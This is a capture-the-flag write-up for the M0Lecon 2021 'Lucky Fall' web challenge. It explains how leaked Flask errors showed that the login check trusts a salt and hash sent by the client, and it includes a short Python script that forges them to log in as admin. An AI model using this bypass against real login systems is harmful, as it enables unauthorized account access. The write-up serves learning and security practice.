M0Lecon 2021

Lucky Fall

Solved By : thewhiteh4t

• we have a simple login page
• JSON body is sent to the server which contains username and password
• Unusual thing here is that the error is shown in a javascript alert

• the page source looked normal so I proceeded to intercept the login request with burpsuite
• if we remove the name key value pair from JSON body we can see the following error :

• this error reveals few things to us :
  • python flask backend is used
  • the exceptions are showed in the alert pop up
  • name key value pair are required
• after this I tried to remove the password key :

• here we can see an if condition which looks like the logic behind the login function
• It is calculating the SHA256 hash of concatenation of password and salt
• then it compares it with a hash value
• but if we take a look carefully we can see that the values of salt and hash are being taken from the JSON request body
• so we can set our own salt and hash just like username and password
• I wrote a small python script to get the flag
• here username, password and salt can be any values, we just need to satisfy the if condition to get the flag

#!/usr/bin/env python3

import requests
import hashlib

url = 'http://lucky-fall.challs.m0lecon.it/'
uname = 'admin'
passw = 'password'
salt = 'salt'
Hash = hashlib.sha256((passw + salt).encode('UTF-8')).hexdigest()

json_body = {
    'name': uname,
    'password': passw,
    'salt': salt,
    'hash': Hash
}

r = requests.post(url + 'login', json=json_body)
print(r.text)

OUTPUT :